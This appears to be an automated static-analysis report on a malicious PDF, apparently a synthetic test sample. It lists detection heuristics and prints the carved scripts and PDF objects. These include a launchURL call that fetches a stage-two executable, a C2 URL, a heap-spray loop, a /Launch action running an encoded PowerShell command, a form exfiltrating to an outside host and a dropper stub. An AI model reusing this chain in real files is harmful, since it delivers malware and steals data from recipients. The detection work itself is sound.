Malicious PDF — malware analysis report

Static analysis result for SHA-256 01e8aa625aedec73…

MALICIOUS

PDF

Size: 2.5 KB | First seen: 2026-06-06
MD5: 594cfc411bef58ba9eac1ca45a3f6dd2
SHA-1: 0039017fe194766609f9d20d9ce18e5455391241
SHA-256: 01e8aa625aedec7370162f0515c056464581f4ac561c582c8f53092cdb5565b5
Risk Score: 546

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics 15

  • Launch action | critical | PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe | critical | PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c powershell -enc SQBFAFgA...' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • JavaScript action | low (3 related findings) | PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster | critical | PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var s = this.getURL('https://evil-dropper.example.cn/beacon');
    eval(unescape('%76%61%72%20%78%3d%31'));
    endstream
  • Embedded JS stream | low | PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript issues an HTTP request on open | low | PDF_JS_NETWORK_BEACON
    Embedded JavaScript calls a network API — this.getURL() to an http(s) URL, XMLHttpRequest, or SOAP — typically an open-time beacon / tracking pixel or data-exfil callback. This abuses a legitimate Acrobat API and exploits no vulnerability; the risk is the unsolicited outbound request (confirming recipient open or fetching a next stage).
    Matched line in script
    app.launchURL(url, true);
    var s = this.getURL('https://evil-dropper.example.cn/beacon');
    eval(unescape('%76%61%72%20%78%3d%31'));
  • Embedded script payload in PDF stream | high | PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • /Launch action paired with attachment-dropping JS API | high | PDF_LAUNCH_PLUS_DROPPER_JS
    PDF combines a /Launch action with a JavaScript API call that writes or opens an attached/external resource — the canonical shape of the CVE-2010-1240 /Launch + exportDataObject family. Benign PDFs do not pair these surfaces; the combination indicates a drop-and-execute chain regardless of the specific JS API knobs or /Launch target.
  • Generic recovered JavaScript exploit stage | high | PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • LOLBin token sequence in document text | high | SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact | high | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • SubmitForm action | medium | PDF_SUBMITFORM
    PDF has a /SubmitForm action — form data can be silently posted to an attacker-controlled URL
  • Embedded file | low | PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • External URI | info | PDF_URI
    PDF contains an external URL action
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL | Referenced by
    • https://evil-dropper.example.cn/beacon | PDF JavaScript
    • http://exfil-server.example.io/collect | PDF JavaScript
    • https://fake-update.example.top/update.bin | PDF JavaScript
    • http://malware-cdn.example.ru/stage2/payload.exe | PDF JavaScript
    • http://185.220.101.45:4444/gate.php | PDF JavaScript
    • http://awr-d.xml.usae/ala.x | PDF JavaScript
    • http://exfil-server.e | PDF JavaScript
    • http://phishing-login.example.org/verify | PDF JavaScript
    • http://malicious-site.example.net/click?id=4571 | PDF JavaScript

Extracted artifacts 7

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
invoice_scan.exe | pdf-embedded-file | PDF EmbeddedFile object 14 at offset 0x7DB | 33 bytes
SHA-256: db48261aa9d79df258f7bcf0422d851f6f16268be63d1dd652b5456485945cb4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
actual_type=PE; declared_or_context_type=PDF; filename=invoice_scan.exe; kind=pdf-embedded-file
javascript_obj0007_000.js | pdf-javascript-stream | PDF /JS object 7 at offset 0x21D | 285 bytes
SHA-256: 8b10a89507b45af8c9149c03c9c69ce11f6fa4ca5f4ea229bcfd2821e1e271dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x6C0 | 141 bytes
SHA-256: ae3db073be58322bb7f6cbeeebdb7219b19a50f0e820958a6d223defea8941ca
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
javascript_obj0007_002.js | pdf-javascript-stream | PDF /JS object 7 at offset 0x23E | 1953 bytes
SHA-256: 82a2141ba0a11a1b5acb87996b6d1a3a43b2586abd4c34df29aafedd610558a0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
javascript_obj0013_003.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x6E2 | 765 bytes
SHA-256: 7415c8b268f11d45cb402d944cc18e06814a498c0acfddfc8a74c88ccf04774f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
embedded_pdf_script_00000579.bin | pdf-embedded-script | PDF decompressed stream script payload at offset 0x579 | 2525 bytes
SHA-256: 245dbb288d497ba7561712e11bdada70ed38360d6c6434522c48483f1affcad7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
%PDF-1.7
%����
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AA << /WillClose 5 0 R /WC 5 0 R >> /Names << /JavaScript << /Names [ (init) 6 0 R ] >> >> /OpenAction << /S /JavaScript /JS 7 0 R >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [ 3 0 R ] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 8 0 R /Annots [ 9 0 R 10 0 R 11 0 R 12 0 R ] >>
endobj
4 0 obj
<< /S /JavaScript /JS 7 0 R >>
endobj
5 0 obj
<< /S /JavaScript /JS 13 0 R >>
endobj
6 0 obj
<< /S /JavaScript /JS 7 0 R >>
endobj
7 0 obj
<< /Length 320 >>
stream
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application/octet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery percent-decode from combined JavaScript objects at offset 0x21D | 3119 bytes
SHA-256: 60b94312accdb85fc15e209533233f1328568cfaa8fbb909e25b65ee26c6c504
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('var x=1'));
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('var x=1'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF